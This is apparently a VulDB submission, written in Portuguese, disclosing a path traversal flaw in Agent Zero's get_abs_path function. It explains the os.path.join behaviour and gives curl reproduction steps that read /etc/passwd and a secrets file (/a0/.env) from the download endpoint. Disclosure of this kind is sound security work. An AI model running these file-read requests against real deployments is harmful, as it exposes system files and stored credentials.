| Título | frdel agent-zero 0.9.7-10 Path Traversal (CWE-22) |
|---|
| Descrição | # Technical Details
An Arbitrary File Read via Path Traversal vulnerability exists in the `get_abs_path()` function in `python/helpers/files.py` of Agent Zero.
The application fails to validate that user-supplied file paths remain within the intended workspace directory. Python's `os.path.join()` discards all previous path components when given an absolute path, allowing attackers to escape the workspace directory.
# Vulnerable Code
File: python/helpers/files.py (get_abs_path function)
Method: get_abs_path(*relative_paths) -> os.path.join(get_base_dir(), *relative_paths)
Why: os.path.join("/workspace", "/etc/passwd") returns "/etc/passwd", completely ignoring the base directory.
Endpoint: python/api/download_work_dir_file.py
Flow: GET /download_work_dir_file?path=/etc/passwd -> file_info.get_file_info("/etc/passwd") -> files.get_abs_path("/etc/passwd") -> returns "/etc/passwd"
# Reproduction
1. Start Agent Zero: docker run -d -p 50001:80 agent0ai/agent-zero:latest
2. Get CSRF token: curl -s -c /tmp/cookies.txt "http://localhost:50001/csrf_token"
3. Read /etc/passwd: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/etc/passwd"
4. Read secrets: curl -s -b /tmp/cookies.txt -H "X-CSRF-Token: $TOKEN" "http://localhost:50001/download_work_dir_file?path=/a0/.env"
# Impact
- Arbitrary file read (system files, SSH keys, cloud credentials)
- Exfiltration of API keys and secrets from /a0/.env
- Chain with leaked A0_PERSISTENT_RUNTIME_ID for authentication bypass and RCE |
|---|
| Fonte | ⚠️ https://gist.github.com/YLChen-007/1819c843ad26aaaaecdc768a789df022 |
|---|
| Utilizador | Eric-y (UID 95889) |
|---|
| Submissão | 05/03/2026 03h23 (há 1 mês) |
|---|
| Moderação | 16/03/2026 22h32 (12 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 351337 [frdel/agent0ai agent-zero 0.9.7-10 python/helpers/files.py get_abs_path Travessia de Diretório] |
|---|
| Pontos | 20 |
|---|